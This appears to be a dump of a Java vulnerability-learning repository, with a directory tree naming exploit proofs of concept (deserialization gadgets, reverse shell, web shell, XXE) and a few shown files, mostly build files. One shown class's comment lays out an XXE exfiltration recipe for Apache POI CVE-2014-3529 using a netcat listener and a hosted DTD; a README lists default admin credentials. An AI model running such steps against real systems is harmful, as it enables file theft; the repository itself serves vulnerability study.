├── .gitignore
├── LICENSE
├── README.md
├── ShardingSphere-UI
├── CVE-2020-1947
│ ├── README.md
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── com
│ │ └── threedr3am
│ │ └── bug
│ │ └── shardingsphere
│ │ └── ui
│ │ └── Poc.java
└── pom.xml
├── apache-poi
├── cve-2014-3529
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── poi
│ │ │ └── CVE_2014_3529.java
│ │ └── resources
│ │ ├── test.xlsx
│ │ └── xxe.dtd
└── pom.xml
├── cas
├── 4.1.7-4.2.x
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── cas
│ │ │ ├── AttackDemo.java
│ │ │ └── package-info.java
│ │ ├── resources
│ │ └── log4j2.xml
│ │ └── webapp
│ │ └── WEB-INF
│ │ ├── cas.properties
│ │ └── web.xml
├── 4.1.x-4.1.6
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── cas
│ │ │ ├── AttackDemo.java
│ │ │ └── package-info.java
│ │ ├── resources
│ │ ├── etc
│ │ │ └── keystore.jceks
│ │ └── log4j2.xml
│ │ └── webapp
│ │ └── WEB-INF
│ │ ├── cas.properties
│ │ └── web.xml
├── 5.x
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── cas
│ │ │ └── package-info.java
│ │ ├── resources
│ │ ├── META-INF
│ │ │ └── spring.factories
│ │ ├── application.properties
│ │ └── log4j2.xml
│ │ └── webapp
│ │ └── WEB-INF
│ │ └── web.xml
├── CAS4PaddingOracleCBC
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── com
│ │ └── threedr3am
│ │ └── bug
│ │ └── cas
│ │ ├── CasPaddingOracleCBC.java
│ │ ├── package-info.java
│ │ └── support
│ │ ├── ByteUtil.java
│ │ ├── CiphertextHeader.java
│ │ └── PaddingOracleCBCForShiro.java
├── cas服务部署.gif
├── cas默认账号密码.txt
├── pom.xml
└── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── cas
│ └── package-info.java
├── common-collections
├── pom.xml
└── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── collections
│ ├── package-info.java
│ └── v3
│ ├── no1
│ └── SerializeMapForTransformer.java
│ ├── no2
│ ├── CallbackRuntime.java
│ ├── CallbackRuntime2.java
│ └── SerializeMapForTransformer.java
│ └── package-info.java
├── common
├── pom.xml
└── src
│ └── main
│ ├── java
│ ├── Calc.java
│ ├── CalcScriptEngineFactory.java
│ ├── ListenerShell.java
│ ├── ReverseShell.java
│ ├── ThymeleafSpelExp.java
│ ├── TomcatEchoInject.java
│ ├── TomcatShellInject.java
│ ├── WebShell.java
│ ├── com
│ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── common
│ │ │ ├── package-info.java
│ │ │ ├── server
│ │ │ ├── FtpServer.java
│ │ │ ├── HTTPServer.java
│ │ │ ├── LdapServer.java
│ │ │ ├── RmiServer.java
│ │ │ └── package-info.java
│ │ │ ├── support
│ │ │ └── ClassFiles.java
│ │ │ └── utils
│ │ │ ├── FileToByteArrayUtil.java
│ │ │ ├── HttpUtil.java
│ │ │ ├── Reflections.java
│ │ │ ├── SerializeUtil.java
│ │ │ ├── TemplatesUtil.java
│ │ │ └── package-info.java
│ └── org
│ │ └── apache
│ │ └── catalina
│ │ └── startup
│ │ └── Catalina.java
│ └── resources
│ └── META-INF
│ └── services
│ └── javax.script.ScriptEngineFactory
├── dubbo
├── dubbo-hessian2-safe-reinforcement
│ ├── learn-dubbo-client-boot
│ │ ├── pom.xml
│ │ └── src
│ │ │ ├── main
│ │ │ ├── java
│ │ │ │ └── com
│ │ │ │ │ └── threedr3am
│ │ │ │ │ └── learn
│ │ │ │ │ ├── client
│ │ │ │ │ └── boot
│ │ │ │ │ │ ├── LearnDubboClientBootApplication.java
│ │ │ │ │ │ └── Test.java
│ │ │ │ │ └── serialize
│ │ │ │ │ ├── MyHessian2Input.java
│ │ │ │ │ ├── MyHessian2ObjectInput.java
│ │ │ │ │ └── MyHessian2Serialization.java
│ │ │ └── resources
│ │ │ │ ├── META-INF
│ │ │ │ └── dubbo
│ │ │ │ │ └── org.apache.dubbo.common.serialize.Serialization
│ │ │ │ └── application.properties
│ │ │ └── test
│ │ │ └── java
│ │ │ └── com
│ │ │ └── threedr3am
│ │ │ └── learn
│ │ │ └── client
│ │ │ └── boot
│ │ │ └── LearnDubboClientBootApplicationTests.java
│ ├── learn-dubbo-server-boot
│ │ ├── pom.xml
│ │ └── src
│ │ │ ├── main
│ │ │ ├── java
│ │ │ │ └── com
│ │ │ │ │ └── threedr3am
│ │ │ │ │ └── learn
│ │ │ │ │ └── server
│ │ │ │ │ └── boot
│ │ │ │ │ ├── A.java
│ │ │ │ │ ├── B.java
│ │ │ │ │ ├── DemoService.java
│ │ │ │ │ ├── DemoServiceImpl.java
│ │ │ │ │ ├── LearnDubboServerBootApplication.java
│ │ │ │ │ └── serialize
│ │ │ │ │ ├── MyHessian2Input.java
│ │ │ │ │ ├── MyHessian2ObjectInput.java
│ │ │ │ │ └── MyHessian2Serialization.java
│ │ │ └── resources
│ │ │ │ ├── META-INF
│ │ │ │ └── dubbo
│ │ │ │ │ └── org.apache.dubbo.common.serialize.Serialization
│ │ │ │ └── application.properties
│ │ │ └── test
│ │ │ └── java
│ │ │ └── com
│ │ │ └── threedr3am
│ │ │ └── learn
│ │ │ └── server
│ │ │ └── boot
│ │ │ └── LearnDubboServerBootApplicationTests.java
│ ├── module-info
│ └── pom.xml
├── pom.xml
└── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── dubbo
│ ├── ResinPoc.java
│ ├── RomePoc.java
│ ├── SpringAbstractBeanFactoryPointcutAdvisorPoc.java
│ ├── XBeanPoc.java
│ ├── rouge
│ ├── RougeBase.java
│ ├── hessian2
│ │ ├── ResinPoc.java
│ │ ├── RomePoc.java
│ │ ├── SpringAbstractBeanFactoryPointcutAdvisorPoc.java
│ │ └── XBeanPoc.java
│ ├── java
│ │ ├── CommonsBeanUtils.java
│ │ ├── CommonsCollections10.java
│ │ ├── CommonsCollections11.java
│ │ ├── CommonsCollections2.java
│ │ ├── CommonsCollections8.java
│ │ ├── DNSURL.java
│ │ └── JRMPClient.java
│ └── package-info.java
│ ├── support
│ └── NoWriteReplaceSerializerFactory.java
│ └── utils
│ ├── Gadgets.java
│ ├── JDKUtil.java
│ ├── SpringUtil.java
│ ├── TemplatesUtil.java
│ ├── ToStringUtil.java
│ └── UtilFactory.java
├── fastjson
├── pom.xml
└── src
│ └── main
│ └── java
│ ├── Evil.java
│ └── com
│ └── threedr3am
│ └── bug
│ └── fastjson
│ ├── dns
│ ├── Inet4AddressPoc.java
│ ├── Inet6AddressPoc.java
│ ├── InetSocketAddressPoc.java
│ └── URLPoc.java
│ ├── dos
│ └── ReDOSPoc.java
│ ├── file
│ └── FileWriteBypassAutoType1_2_68.java
│ ├── leak
│ └── seleniumBypassAutotype1_2_68.java
│ ├── package-info.java
│ ├── rce
│ ├── AnterosPoc.java
│ ├── AriesJMSPoc.java
│ ├── AriesJMSPoc2.java
│ ├── Cmd.java
│ ├── CocoonSlidePoc.java
│ ├── CommonsProxyPoc.java
│ ├── FastjsonSerialize.java
│ ├── HadoopHikariPoc.java
│ ├── HikariConfigPoc.java
│ ├── IbatisSqlmapPoc.java
│ ├── IgniteJtaPoc.java
│ ├── JndiConverterPoc.java
│ ├── NoNeedAutoTypePoc.java
│ ├── QuercusPoc.java
│ ├── ShiroPoc.java
│ └── ShiroPoc2.java
│ └── ssrf
│ ├── ApacheCxfSSRFPoc.java
│ ├── ApacheCxfSSRFPoc2.java
│ ├── CommonsJellySSRFPoc.java
│ └── JREJeditorPaneSSRFPoc.java
├── feature
├── pom.xml
└── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── feature
│ ├── CAS4$1And4$2.java
│ ├── FastjsonSerialization.java
│ ├── HessianSerialization.java
│ ├── JYAML.java
│ ├── JacksonSerialization.java
│ ├── JavaClassByteCode.java
│ ├── JavaSerialization.java
│ ├── JolokiaAttackUrlFeature.java
│ ├── KryoSerialization.java
│ ├── SnakeYAML.java
│ ├── XStream.java
│ └── package-info.java
├── jackson
├── pom.xml
└── src
│ └── main
│ ├── java
│ └── com
│ │ └── threedr3am
│ │ └── bug
│ │ └── jackson
│ │ ├── MysqlFileRead.java
│ │ ├── package-info.java
│ │ ├── rce
│ │ ├── AnterosPoc.java
│ │ ├── AriesJMSPoc.java
│ │ ├── AriesJMSPoc2.java
│ │ ├── EhcacheJndi.java
│ │ ├── H2Rce.java
│ │ ├── HadoopHikariConfigPoc.java
│ │ ├── HikariConfigPoc.java
│ │ ├── IbatisSqlmapPoc.java
│ │ ├── IgniteJtaPoc.java
│ │ ├── IgniteJtaPoc2.java
│ │ ├── JndiConverterPoc.java
│ │ ├── LogbackJndi.java
│ │ ├── QuartzPoc.java
│ │ ├── QuercusPoc.java
│ │ ├── ShiroPoc.java
│ │ ├── ShiroPoc2.java
│ │ ├── SpringAopPoc.java
│ │ └── SpringAopPoc2.java
│ │ ├── ssrf
│ │ └── JREJeditorPaneSSRFPoc.java
│ │ └── test
│ │ ├── A.java
│ │ ├── DefaultTypeTest.java
│ │ ├── JsonTypeInfoTest.java
│ │ └── PocTest.java
│ └── resources
│ └── inject.sql
├── java-compile
├── pom.xml
└── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── compile
│ ├── javac
│ ├── ByJavaCompiler.java
│ ├── ByJavaFileObject.java
│ ├── CustomJavaFileObject.java
│ ├── CustomJavaFileObjectAndFileManeger.java
│ └── RuntimeMakeClass.java
│ ├── javassist
│ └── Javassist.java
│ └── package-info.java
├── nexus
├── CVE-2020-10199
│ └── README.md
├── CVE-2020-10204
│ └── README.md
├── CVE-2020-11444
│ └── README.md
└── pom.xml
├── padding-oracle-cbc
├── pom.xml
└── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── paddingoraclecbc
│ ├── PaddingOracle.java
│ ├── PaddingOracleCBC.java
│ ├── PaddingOracleCBC2.java
│ ├── PaddingOracleCBCForShiro.java
│ └── package-info.java
├── pom.xml
├── rmi
├── pom.xml
└── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── rmi
│ ├── CommonCollections4.java
│ ├── client
│ ├── JndiLookupForGtJdk8u191.java
│ ├── JndiLookupForJdk8u121To191.java
│ ├── JndiLookupForLeJdk8u121.java
│ └── RMIClient.java
│ ├── registry
│ ├── AttackRMIRegistry.java
│ └── RMIRegistry.java
│ ├── server
│ ├── RMIServer.java
│ └── service
│ │ ├── HelloService.java
│ │ └── HelloServiceImpl.java
│ ├── support
│ └── ClassFiles.java
│ └── utils
│ ├── Gadgets.java
│ └── Reflections.java
├── security-manager
├── pom.xml
└── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── security
│ └── manager
│ ├── AttackTest.java
│ ├── CodeBaseTest.java
│ ├── Evil.java
│ └── package-info.java
├── shiro
├── auth-bypass-shiro-1-4-1
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── com
│ │ └── threedr3am
│ │ └── bug
│ │ └── shiro
│ │ └── bypass
│ │ └── auth
│ │ ├── Application.java
│ │ ├── config
│ │ └── ShiroConfig.java
│ │ ├── controller
│ │ ├── BypassTestController.java
│ │ └── LoginController.java
│ │ └── realm
│ │ └── MyRealm.java
├── auth-bypass-shiro-1-5-1
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── shiro
│ │ │ └── bypass
│ │ │ └── auth
│ │ │ ├── Application.java
│ │ │ ├── config
│ │ │ └── ShiroConfig.java
│ │ │ ├── controller
│ │ │ ├── BypassTestController.java
│ │ │ └── LoginController.java
│ │ │ └── realm
│ │ │ └── MyRealm.java
│ │ └── resources
│ │ └── application.yml
├── auth-bypass-shiro-1-5-3
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── me
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── shiro
│ │ │ └── bypass
│ │ │ └── auth
│ │ │ ├── Application.java
│ │ │ ├── config
│ │ │ └── ShiroConfig.java
│ │ │ ├── controller
│ │ │ ├── BypassTestController.java
│ │ │ └── LoginController.java
│ │ │ └── realm
│ │ │ └── MyRealm.java
│ │ └── resources
│ │ └── application.yml
├── auth-bypass-shiro-1-7-1
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── me
│ │ └── threedr3am
│ │ └── bug
│ │ └── shiro
│ │ └── bypass
│ │ └── auth
│ │ ├── Application.java
│ │ ├── config
│ │ └── ShiroConfig.java
│ │ ├── controller
│ │ ├── BypassTestController.java
│ │ └── LoginController.java
│ │ └── realm
│ │ └── MyRealm.java
├── auth-bypass-shiro-1-8-0
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── me
│ │ └── threedr3am
│ │ └── bug
│ │ └── shiro
│ │ └── bypass
│ │ └── auth
│ │ ├── Application.java
│ │ ├── config
│ │ └── ShiroConfig.java
│ │ ├── controller
│ │ ├── BypassTestController.java
│ │ └── LoginController.java
│ │ └── realm
│ │ └── MyRealm.java
└── pom.xml
├── spring
├── pom.xml
├── spring-boot-actuator-bug
│ ├── README.md
│ ├── actuator-1.2
│ │ ├── pom.xml
│ │ └── src
│ │ │ └── main
│ │ │ ├── java
│ │ │ └── com
│ │ │ │ └── threedr3am
│ │ │ │ └── bug
│ │ │ │ └── spring
│ │ │ │ └── actuator
│ │ │ │ ├── Application.java
│ │ │ │ ├── AttackSnakeYaml.java
│ │ │ │ └── JolokiaAttackForLogback.java
│ │ │ └── resources
│ │ │ ├── logback-evil.xml
│ │ │ ├── logback.xml
│ │ │ └── snake-yaml-evil.yml
│ ├── actuator-1.3
│ │ ├── pom.xml
│ │ └── src
│ │ │ └── main
│ │ │ ├── java
│ │ │ └── com
│ │ │ │ └── threedr3am
│ │ │ │ └── bug
│ │ │ │ └── spring
│ │ │ │ └── actuator
│ │ │ │ ├── Application.java
│ │ │ │ ├── AttackSnakeYaml.java
│ │ │ │ └── JolokiaAttackForLogback.java
│ │ │ └── resources
│ │ │ ├── logback-evil.xml
│ │ │ ├── logback.xml
│ │ │ └── snake-yaml-evil.yml
│ ├── actuator-1.4
│ │ ├── pom.xml
│ │ └── src
│ │ │ └── main
│ │ │ ├── java
│ │ │ └── com
│ │ │ │ └── threedr3am
│ │ │ │ └── bug
│ │ │ │ └── spring
│ │ │ │ └── actuator
│ │ │ │ ├── Application.java
│ │ │ │ ├── AttackSnakeYaml.java
│ │ │ │ ├── EurekaAttackForXStream.java
│ │ │ │ └── JolokiaAttackForLogback.java
│ │ │ └── resources
│ │ │ ├── logback-evil.xml
│ │ │ ├── logback.xml
│ │ │ ├── snake-yaml-evil.yml
│ │ │ └── xstream-evil.xml
│ ├── actuator-1.5
│ │ ├── pom.xml
│ │ └── src
│ │ │ └── main
│ │ │ ├── java
│ │ │ └── com
│ │ │ │ └── threedr3am
│ │ │ │ └── bug
│ │ │ │ └── spring
│ │ │ │ └── actuator
│ │ │ │ ├── Application.java
│ │ │ │ ├── AttackSnakeYaml.java
│ │ │ │ ├── JolokiaAttackForLogback.java
│ │ │ │ └── package-info.java
│ │ │ └── resources
│ │ │ ├── application.yml
│ │ │ ├── logback-evil.xml
│ │ │ ├── logback.xml
│ │ │ └── snake-yaml-evil.yml
│ ├── actuator-2.0
│ │ ├── pom.xml
│ │ └── src
│ │ │ └── main
│ │ │ ├── java
│ │ │ └── com
│ │ │ │ └── threedr3am
│ │ │ │ └── bug
│ │ │ │ └── spring
│ │ │ │ └── actuator
│ │ │ │ ├── Application.java
│ │ │ │ ├── AttackHikariCP.java
│ │ │ │ ├── AttackSnakeYaml.java
│ │ │ │ ├── JolokiaAttackForLogback.java
│ │ │ │ └── package-info.java
│ │ │ └── resources
│ │ │ ├── application.yml
│ │ │ └── logback.xml
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── com
│ │ └── threedr3am
│ │ └── bug
│ │ └── spring
│ │ └── actuator
│ │ └── snakeyaml
│ │ ├── A.java
│ │ └── SnakeYamlTest.java
├── spring-cloud-config-server-CVE-2019-3799
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── spring
│ │ │ └── config
│ │ │ └── server
│ │ │ ├── Application.java
│ │ │ └── package-info.java
│ │ └── resources
│ │ └── application.yml
├── spring-cloud-config-server-CVE-2020-5405
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── spring
│ │ │ └── config
│ │ │ └── server
│ │ │ ├── Application.java
│ │ │ └── package-info.java
│ │ └── resources
│ │ └── application.yml
├── spring-cloud-config-server-CVE-2020-5410
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── spring
│ │ │ └── config
│ │ │ └── server
│ │ │ ├── Application.java
│ │ │ └── package-info.java
│ │ └── resources
│ │ └── application.yml
├── spring-data-mongodb-spel-CVE-2022-22980
│ ├── README.md
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ ├── java
│ │ └── com
│ │ │ └── threedr3am
│ │ │ └── bug
│ │ │ └── spring
│ │ │ └── data
│ │ │ └── mongodb
│ │ │ ├── Application.java
│ │ │ ├── controller
│ │ │ └── DemoController.java
│ │ │ ├── entity
│ │ │ └── Demo.java
│ │ │ └── repository
│ │ │ └── DemoRepository.java
│ │ └── resources
│ │ └── application.yml
├── spring-session-redis-sync
│ ├── 1
│ │ ├── pom.xml
│ │ └── src
│ │ │ └── main
│ │ │ ├── java
│ │ │ └── me
│ │ │ │ └── threedr3am
│ │ │ │ └── bug
│ │ │ │ └── spring
│ │ │ │ └── redis
│ │ │ │ └── session
│ │ │ │ ├── Application.java
│ │ │ │ ├── config
│ │ │ │ └── SpringHttpSessionConfig.java
│ │ │ │ └── controller
│ │ │ │ └── TestController.java
│ │ │ └── resources
│ │ │ └── application.yml
│ ├── 2
│ │ ├── pom.xml
│ │ └── src
│ │ │ └── main
│ │ │ ├── java
│ │ │ └── me
│ │ │ │ └── threedr3am
│ │ │ │ └── bug
│ │ │ │ └── spring
│ │ │ │ └── redis
│ │ │ │ └── session
│ │ │ │ ├── Application.java
│ │ │ │ ├── config
│ │ │ │ └── SpringHttpSessionConfig.java
│ │ │ │ └── controller
│ │ │ │ └── TestController.java
│ │ │ └── resources
│ │ │ └── application.yml
│ ├── README.md
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── me
│ │ └── threedr3am
│ │ └── bug
│ │ └── spring
│ │ └── redis
│ │ └── session
│ │ ├── CommonCollections4.java
│ │ ├── Main.java
│ │ ├── support
│ │ └── ClassFiles.java
│ │ └── utils
│ │ ├── Gadgets.java
│ │ └── Reflections.java
├── spring-uricomponentsbuilder-2
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── com
│ │ └── threedr3am
│ │ └── bug
│ │ └── spring
│ │ └── uricomponentsbuilder
│ │ ├── Main.java
│ │ └── controller
│ │ └── OAuthController.java
└── spring-uricomponentsbuilder
│ ├── pom.xml
│ └── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── spring
│ └── uricomponentsbuilder
│ ├── Main.java
│ └── controller
│ └── OAuthController.java
├── tomcat
├── ajp-bug
│ ├── README.md
│ ├── pom.xml
│ └── src
│ │ └── main
│ │ └── java
│ │ └── com
│ │ └── threedr3am
│ │ └── bug
│ │ └── tomcat
│ │ └── ajp
│ │ ├── FileRead.java
│ │ └── support
│ │ ├── SimpleAjpClient.java
│ │ └── TesterAjpMessage.java
├── pom.xml
├── session-filestore
│ ├── README.md
│ └── pom.xml
└── sync-session-bug
│ ├── README.md
│ ├── pom.xml
│ └── src
│ └── main
│ └── java
│ └── com
│ └── threedr3am
│ └── bug
│ └── tomcat
│ └── sync
│ └── session
│ ├── TomcatSessionClusterExploit.java
│ ├── payload
│ ├── Jdk7u21.java
│ ├── Jdk8u20.java
│ ├── Payload.java
│ ├── Payloads.java
│ └── URLDNS.java
│ ├── support
│ ├── ChannelData.java
│ ├── ChannelMessage.java
│ ├── ClusterMessage.java
│ ├── ClusterMessageBase.java
│ ├── Member.java
│ ├── MemberImpl.java
│ ├── SessionMessage.java
│ ├── SessionMessageImpl.java
│ ├── UUIDGenerator.java
│ └── XByteBuffer.java
│ └── utils
│ ├── ClassFiles.java
│ ├── Converter.java
│ ├── Gadgets.java
│ ├── Reflections.java
│ └── Serializer.java
└── xxe
├── pom.xml
└── src
└── main
└── java
└── com
└── threedr3am
└── bug
└── xxe
├── DocumentBuilderFactory_DOMTest.java
├── Features.java
├── Payloads.java
├── SAXBuilder_JDOMTest.java
├── SAXParserFactory_SAXTest.java
├── SAXReader_DOM4JTest.java
├── SAXTransformerFactoryTest.java
├── SchemaFactoryTest.java
├── TransformerFactoryTest.java
├── UnmarshallerTest.java
├── ValidatorSampleTest.java
├── XMLReaderTest.java
└── package-info.java
/.gitignore:
--------------------------------------------------------------------------------
1 | .idea
2 | *.iml
3 | target
4 | cas/**/overlays
5 | cas/**/lib
6 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 threedr3am
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/ShardingSphere-UI/CVE-2020-1947/README.md:
--------------------------------------------------------------------------------
1 | ### *ShardingSphere-UI YAML反序列化*
2 |
3 | CVE-2020-1947
4 |
5 | #### 二进制运行
6 | - git clone https://github.com/apache/incubator-shardingsphere.git;
7 | - 运行 mvn clean install -Prelease;
8 | - 获取安装包 /sharding-distribution/shardingsphere-ui-distribution/target/apache-shardingsphere-incubating-${latest.release.version}-sharding-ui-bin.tar.gz;
9 | - 解压缩后运行bin/start.sh;
10 | - 访问http://localhost:8088/。
11 |
12 | ```
13 | server.port=8088
14 |
15 | user.admin.username=admin
16 | user.admin.password=admin
17 | ```
--------------------------------------------------------------------------------
/ShardingSphere-UI/CVE-2020-1947/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | ShardingSphere-UI
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | CVE-2020-1947
13 |
14 |
15 |
16 | com.xyh
17 | common
18 | 1.0-SNAPSHOT
19 |
20 |
21 |
--------------------------------------------------------------------------------
/ShardingSphere-UI/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | learn-java-bug
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | ShardingSphere-UI
13 | pom
14 |
15 | CVE-2020-1947
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/apache-poi/cve-2014-3529/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | apache-poi
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | cve-2014-3529
13 |
14 |
15 |
16 |
17 | org.apache.poi
18 | poi-ooxml
19 | 3.10-FINAL
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/apache-poi/cve-2014-3529/src/main/java/com/threedr3am/bug/poi/CVE_2014_3529.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.poi;
2 |
3 | import java.io.IOException;
4 | import org.apache.poi.EncryptedDocumentException;
5 | import org.apache.poi.ss.usermodel.Sheet;
6 | import org.apache.poi.ss.usermodel.Workbook;
7 | import org.apache.poi.ss.usermodel.WorkbookFactory;
8 |
9 | /**
10 | * 1. unzip test.xlsx
11 | * 2. vim [Content_Types].xml,line-2 insert ( %remote;%all;]>&send; )
12 | * 3. zip -r 0 test.xlsx ./*
13 | * 4. echo "threedr3am" > /tmp/flag
14 | * 5. nc -lvvp 23235
15 | * 6. cp xxe.dtd /tmp/poi/xxe.dtd & cd /tmp/poi/ & python -m SimpleHTTPServer 23234
16 | *
17 | * @author threedr3am
18 | */
19 | public class CVE_2014_3529 {
20 |
21 | public static void main(String[] args)
22 | throws IOException, EncryptedDocumentException, org.apache.poi.openxml4j.exceptions.InvalidFormatException {
23 | Workbook wb1 = WorkbookFactory.create(CVE_2014_3529.class.getClassLoader().getResourceAsStream("test.xlsx"));
24 | Sheet sheet = wb1.getSheetAt(0);
25 | System.out.println(sheet.getLastRowNum());
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/apache-poi/cve-2014-3529/src/main/resources/test.xlsx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/threedr3am/learnjavabug/3f7fe9d8eab29f88fd0c6fb8362d21696b5cb95c/apache-poi/cve-2014-3529/src/main/resources/test.xlsx
--------------------------------------------------------------------------------
/apache-poi/cve-2014-3529/src/main/resources/xxe.dtd:
--------------------------------------------------------------------------------
1 | ">
--------------------------------------------------------------------------------
/apache-poi/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | learn-java-bug
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | apache-poi
13 | pom
14 |
15 | cve-2014-3529
16 |
17 |
18 |
--------------------------------------------------------------------------------
/cas/4.1.7-4.2.x/src/main/java/com/threedr3am/bug/cas/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * @author threedr3am
3 | */
4 | package com.threedr3am.bug.cas;
--------------------------------------------------------------------------------
/cas/4.1.x-4.1.6/src/main/java/com/threedr3am/bug/cas/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * @author threedr3am
3 | */
4 | package com.threedr3am.bug.cas;
--------------------------------------------------------------------------------
/cas/4.1.x-4.1.6/src/main/resources/etc/keystore.jceks:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/threedr3am/learnjavabug/3f7fe9d8eab29f88fd0c6fb8362d21696b5cb95c/cas/4.1.x-4.1.6/src/main/resources/etc/keystore.jceks
--------------------------------------------------------------------------------
/cas/5.x/src/main/java/com/threedr3am/bug/cas/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * overlays:想要自定义啥东西,从target/cas自己捞,classes里面的文件,如果是类, 则按照包名和类名在src/main/java放,若是资源文件,则放置到resources
3 | *
4 | * 启动的话,需要在project structure,即项目结构设置中Facets的web添加当前项目的资源目录(webapp)进去,然后配置artifacts,添加web application
5 | * archive和web application exploded,前者对应war包,后者对应war解压目录,tomcat部署需要
6 | *
7 | * @author threedr3am
8 | */
9 | package com.threedr3am.bug.cas;
--------------------------------------------------------------------------------
/cas/5.x/src/main/resources/META-INF/spring.factories:
--------------------------------------------------------------------------------
1 | org.springframework.boot.autoconfigure.EnableAutoConfiguration=\
2 | org.apereo.cas.config.CasEmbeddedContainerTomcatConfiguration,\
3 | org.apereo.cas.config.CasEmbeddedContainerTomcatFiltersConfiguration
4 |
5 |
--------------------------------------------------------------------------------
/cas/5.x/src/main/webapp/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
6 |
--------------------------------------------------------------------------------
/cas/CAS4PaddingOracleCBC/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | cas
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | PaddingOracleCBC
13 |
14 |
15 |
16 | com.xyh
17 | common
18 | 1.0-SNAPSHOT
19 |
20 |
21 |
22 |
--------------------------------------------------------------------------------
/cas/CAS4PaddingOracleCBC/src/main/java/com/threedr3am/bug/cas/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * CAS-4 PaddingOracle CBC攻击
3 | *
4 | * @author threedr3am
5 | */
6 | package com.threedr3am.bug.cas;
--------------------------------------------------------------------------------
/cas/cas服务部署.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/threedr3am/learnjavabug/3f7fe9d8eab29f88fd0c6fb8362d21696b5cb95c/cas/cas服务部署.gif
--------------------------------------------------------------------------------
/cas/cas默认账号密码.txt:
